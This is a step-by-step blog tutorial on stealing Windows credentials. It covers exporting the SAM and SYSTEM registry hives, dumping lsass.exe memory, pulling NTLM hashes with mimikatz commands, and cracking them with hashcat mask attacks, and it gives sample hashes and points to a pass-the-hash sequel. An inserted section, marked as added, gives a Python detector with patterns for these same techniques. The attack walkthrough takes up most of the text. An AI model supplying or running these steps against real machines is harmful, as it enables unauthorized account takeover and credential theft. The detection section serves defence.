How to hack a Windows password

In this article, we will find out where Windows stores the user password, how to extract the data needed to crack a Windows password, how to crack a user password, and what a pass-the-hash attack is.

Not everyone uses a password on Windows – it is especially rare for users to set a password on a home computer that only one person works on. But in a corporate network, or when Windows is used as a server, a password is required. Another interesting property of a Windows user password: if a user signs in with an online Microsoft account, the password hash is still stored on the local computer, and the recovered password can be used to log in both to the local computer and to Microsoft online services.

Where does Windows store user login password?

Windows user passwords are stored in the SAM and SYSTEM hives of the Windows registry, which live in the files:

  • C:\Windows\System32\config\SAM
  • C:\Windows\System32\config\SYSTEM

Instead of a plain text password, Windows stores password hashes. These hashes can be brute-forced easily. But even without cracking, Windows password hashes can be used to collect data and carry out attacks.

How to get Windows password hashes

Dump Windows password hashes on a running computer

On a running system, the files C:\Windows\System32\config\SAM and C:\Windows\System32\config\SYSTEM are locked and hard to access directly, although it is possible. To save copies of these hives, you can use the reg utility:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

In some tutorials the SECURITY hive is saved instead of SYSTEM – this is a mistake: you cannot recover the hash from the SECURITY and SAM hives, you need SYSTEM and SAM!

The password hash is also held in RAM, namely in the Local Security Authority Process (lsass.exe). This process is always running on a live Windows system, and its memory can be dumped (a copy of the process's memory is written to a file on disk). You can use various utilities to create a dump, including two official ones:

Task Manager is present on every Windows installation; to open it, press Win+R, type taskmgr and press Enter. Alternatively, right-click the taskbar (the bottom bar where the clock, Start button, etc. are located) and select “Task Manager” in the context menu.

In the Task Manager, click “Details” and in the “Processes” tab, in the “Windows Processes” section, find the Local Security Authority Process, right-click on it and select “Create Dump File” in the context menu:

Wait for completion:

The file will be saved along the C:\Users\USERNAME\AppData\Local\Temp\lsass.DMP path. I have the MiAl username and the path to the file C:\Users\MiAl\AppData\Local\Temp\lsass.DMP.

Dump Windows password hashes on a turned off computer

On a turned-off computer, it is enough to copy the following files for later recovery of the user's password:

  • C:\Windows\System32\config\SAM
  • C:\Windows\System32\config\SYSTEM

The same files can be found in a Windows backup or in a shadow copy of the disk, or you can copy them after booting from a live system.

What is the difference between NTLM and NTLMv1/v2 hashes and Net-NTLMv1/v2

Now we will hunt for the NTLM hash. In the article “Windows Network Authentication Hacking”, we already hunted for NTLMv1 and NTLMv2 hashes, whose names are quite similar.

Actually, NTLM and NTLMv1/v2 are quite different things. The NTLM hash is stored and used locally, while the NTLMv1/NTLMv2 hashes are used for network authentication and are derived from the NTLM hash. Any of these hashes can be used to recover the Windows user password, but they are different algorithms and are cracked differently.

For the Pass-the-hash attack (we will cover it in this article), we use only the NTLM hash, and the NTLMv1/NTLMv2 hashes are not suitable.

One more question remains: what are Net-NTLMv1/v2 hashes? Net-NTLMv1/v2 is simply another name for NTLMv1/v2 hashes, i.e. NTLMv1/v2 and Net-NTLMv1/v2 are the same thing, while NTLM is different.

In this article, we will extract the NTLM hash, crack it, and also use it without brute-forcing.

What is mimikatz

The mimikatz program is well known for its ability to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash and pass-the-ticket attacks or build Golden Tickets.

In this guide, we will only look at mimikatz's ability to extract NTLM hashes. Remember, mimikatz also has other very interesting features – look at its extensive help: https://github.com/gentilkiwi/mimikatz/wiki

There are implementations of mimikatz in Meterpreter and Metasploit, as a reflectively loaded DLL in PowerShell, and in other products. mimikatz can be run under Wine on Linux, but the functions that extract data directly from a running Windows system will not work; the functions that extract hashes from dumps or from registry files should work on Linux.

How to install mimikatz on Windows

mimikatz is a portable command-line utility, so no installation is required, but you do need to know how to launch it if you are not very familiar with the command line.

1. Go to https://github.com/gentilkiwi/mimikatz/releases, download the mimikatz_trunk.7z or mimikatz_trunk.zip file. Unzip the downloaded archive.

2. Open PowerShell (Win+x → Windows PowerShell (administrator)) or the command line (Win+r → cmd).

3. At the command prompt, use the cd command to navigate to the folder with the mimikatz.exe executable file. For example, the archive is unpacked into the C:\Users\MiAl\Downloads folder, then the executable file will be in the C:\Users\MiAl\Downloads\mimikatz_trunk\x64\ folder:

cd C:\Users\MiAl\Downloads\mimikatz_trunk\x64\

4. Run the executable file.

.\mimikatz.exe

How to extract NTLM user password hash from registry files

The following commands must be executed in the mimikatz console.

The log command enables writing all output to a FILE:

log FILE

For example, to write all output to the hash.txt file:

log hash.txt

I copied the SYSTEM and SAM files from the turned off computer, now to extract the hash I need to run a command of the form:

lsadump::sam /system:C:\path\to\SYSTEM /sam:C:\path\to\SAM

An example of my command:

lsadump::sam /system:C:\Share-Server\files\SYSTEM /sam:C:\Share-Server\files\SAM

Output Example:

The output is quite extensive and contains a lot of data. The lines of interest come in pairs of the form:

User : USERNAME
  Hash NTLM: HASH

In my example, the interesting lines are:

User : ShareOverlord
  Hash NTLM: 7ce21f17c0aee7fb9ceba532d0546ad6

User : Alexey
  Hash NTLM: ca76a176340f0291e1cc8ea7277fc571

There are also lines with usernames:

User : MiAl
User : Администратор

But they are not followed by a line with an NTLM hash, because these users do not have a password set.

If you want to extract data from the registry files of the current operating system, first exit mimikatz by pressing Ctrl+C.

Now we will dump the SYSTEM and SAM registry hives of the current system:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

Run mimikatz again:

.\mimikatz.exe

Turn on logging:

log hash-local.txt

Then execute the command, pointing it at the files the registry hives were saved to, that is, SystemBkup.hiv and SamBkup.hiv:

lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

Output Example:

Only one user with a hash was found here:

User : Администратор
  Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f

In fact, dumping the registry hives was not necessary to extract NTLM hashes from the local system. Another option is to elevate the privileges of the mimikatz process itself and extract the hashes directly from the system. To do this, run the commands:

privilege::debug
token::elevate
log hash-local2.txt
lsadump::sam
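Every step shown so far leaves telemetry a defender can alert on: the reg save of the SAM and SYSTEM hives, the Task Manager dump of lsass.exe, and the mimikatz module syntax (lsadump::, sekurlsa::, privilege::, token::). The following added example, which is not part of the original article, runs such rules over constructed Sysmon-style records; the field names follow Sysmon's schema (EventID 1 ProcessCreate, 10 ProcessAccess, 11 FileCreate), while the records, paths and access-mask values are assumptions made for illustration.

```python
import re

# Constructed Sysmon-style records (not real logs) for the techniques on this page:
# EventID 1 = ProcessCreate, 10 = ProcessAccess, 11 = FileCreate.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SAM SamBkup.hiv"},
    {"EventID": 1, "Image": r"C:\Users\MiAl\Downloads\mimikatz_trunk\x64\mimikatz.exe",
     "CommandLine": r".\mimikatz.exe"},
    {"EventID": 1, "Image": r"C:\Users\MiAl\Downloads\x64\svc.exe",  # renamed copy
     "CommandLine": r"svc.exe privilege::debug token::elevate lsadump::sam exit"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",  # "Create dump file"
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",  # query-only access
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 11, "Image": r"C:\Windows\System32\taskmgr.exe",
     "TargetFilename": r"C:\Users\MiAl\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",  # benign reg usage
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"},
]

HIVE_EXPORT = re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SYSTEM)\b", re.I)
MIMIKATZ_MODULE = re.compile(r"\b(?:lsadump|sekurlsa|privilege|token)::", re.I)
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory


def classify(ev):
    """Return the detection names that fire for one event (empty list if none)."""
    hits = []
    eid = ev.get("EventID")
    if eid == 1:
        cmd = ev.get("CommandLine", "")
        if HIVE_EXPORT.search(cmd):
            hits.append("sam_system_hive_export")
        # Match the module syntax, not only the file name: a renamed binary still uses it.
        if "mimikatz" in ev.get("Image", "").lower() or MIMIKATZ_MODULE.search(cmd):
            hits.append("mimikatz_activity")
    elif eid == 10 and ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        if int(ev.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ:
            hits.append("lsass_memory_read")
    elif eid == 11 and ev.get("TargetFilename", "").lower().endswith(r"\lsass.dmp"):
        hits.append("lsass_dump_file_written")
    return hits


def scan(events):
    """(index, hits) for every event that triggered at least one detection."""
    return [(i, h) for i, ev in enumerate(events) if (h := classify(ev))]


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["EventID"], hits)
```

In production the lsass rule needs an allowlist of legitimate readers (EDR agents, the system's own components), and the hive-export rule should also cover other ways of reading the hive files, such as copying them from a shadow copy as the article describes.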

How to extract NTLM hash from lsass.DMP file

Logically (and in practice), the dump of the Local Security Authority Process should contain only the hashes of users who logged in with a password.

First, specify the path to the dump file with a command of the form:

sekurlsa::minidump C:\path\to\lsass.DMP

For instance:

sekurlsa::minidump C:\Share-Server\files\lsass.DMP

Then run the command:

sekurlsa::logonPasswords

How to brute-force NTLM hash

For hacking I will take the following hash:

User : Alexey
  Hash NTLM: ca76a176340f0291e1cc8ea7277fc571

Take a look at the Hashcat help to find out the NTLM hash mode number:

   1000 | NTLM                                             | Operating Systems

That is, the hashcat mode number for NTLM is 1000.

To launch a mask attack to crack NTLM in Hashcat, you need to run a command of the form:

hashcat -m 1000 -a 3 'HASH' MASK

An example of my real command:

hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?d ca76a176340f0291e1cc8ea7277fc571 ?1?1?1?1?1?1?1?1?1

In this command:

  • hashcat is the name of the executable file. On Windows, it could be hashcat64.exe.
  • --force means ignore warnings
  • --hwmon-temp-abort=100 sets the maximum temperature, after which the brute-force attack is interrupted, to 100 degrees Celsius
  • -m 1000 means NTLM hash type
  • -D 1,2 means use both the central processor and the video card for brute-forcing
  • -a 3 means mask attack
  • -i means gradually increase the number of characters in the generated passwords
  • --increment-min 1 means start with a mask length of one
  • --increment-max 10 means end the search at a mask length of ten
  • -1 ?l?d defines custom character set number 1, consisting of lowercase Latin letters (?l) and digits (?d)
  • ca76a176340f0291e1cc8ea7277fc571 is the hash to crack
  • ?1?1?1?1?1?1?1?1?1 is a mask built from the custom character set

Let's hack one more hash:

User : Администратор
  Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f

Command (another hash and another set of custom characters):

hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?u?d 5187b179ba87f3ad85fea3ed718e961f ?1?1?1?1?1?1?1?1?1

So, in this article, we learned how to extract an NTLM hash and crack a Windows password. But what if you fail to crack NTLM? See the second part, entitled “Pass-the-hash attack (how to use NTLM without cracking a password)” for the answer.
